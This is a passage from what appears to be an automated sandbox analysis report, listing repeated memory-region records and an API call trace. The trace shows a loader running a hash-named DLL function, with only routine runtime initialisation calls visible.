0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16183 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16184 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16185 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16186 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16187 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16188 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16189 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16190 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16191 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16192 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16193 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16238 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16239 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16240 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16241 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16242 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16243 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16244 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16245 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16246 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16247 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16248 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16249 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16250 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16251 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16252 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16253 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16254 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16255 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16256 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16257 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16258 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16259 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16260 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16261 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16262 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16263 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16264 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16265 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16266 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16267 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16268 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16269 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16270 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16271 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16272 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16273 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16274 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16275 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16276 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16277 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16278 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16279 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16280 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16281 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16282 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16283 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16284 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16332 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16333 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16334 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16335 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16336 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16337 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16338 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16339 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16340 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16341 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16342 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16343 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16344 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16345 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16346 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16347 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16348 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16349 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16350 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16351 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16352 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16353 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16354 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16355 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16356 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16357 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16358 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16359 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16360 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16361 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16362 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16363 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16364 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16365 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16366 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16367 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16368 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16369 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16412 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16413 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16414 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16415 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16416 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16417 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16418 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16419 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16420 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16421 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16422 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16423 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16424 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16425 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16426 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16427 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16428 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16429 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16430 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16431 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16432 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16433 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16434 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16435 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16436 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16437 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16438 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16439 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16440 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16441 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16442 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 16443 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Thread: id = 192 os_tid = 0xf44 [0188.398] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0188.399] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0188.399] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0188.399] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0188.399] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0188.400] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0188.401] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0188.402] GetProcessHeap () returned 0x560000 [0188.402] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0188.402] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0188.402] GetLastError () returned 0x7e [0188.402] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0188.402] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0188.403] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x3c8) returned 0x56c2f0 [0188.403] SetLastError (dwErrCode=0x7e) [0188.403] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1200) returned 0x573440 [0188.407] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0188.407] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0188.407] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0188.407] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0188.407] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_encode" [0188.407] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_encode" [0188.408] GetACP () returned 0x4e4 [0188.408] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x228) returned 0x565350 [0188.408] IsValidCodePage (CodePage=0x4e4) returned 1 [0188.408] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0188.408] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0188.408] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0188.408] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0188.409] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0188.409] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0188.409] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0188.409] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0188.409] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0188.409] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", 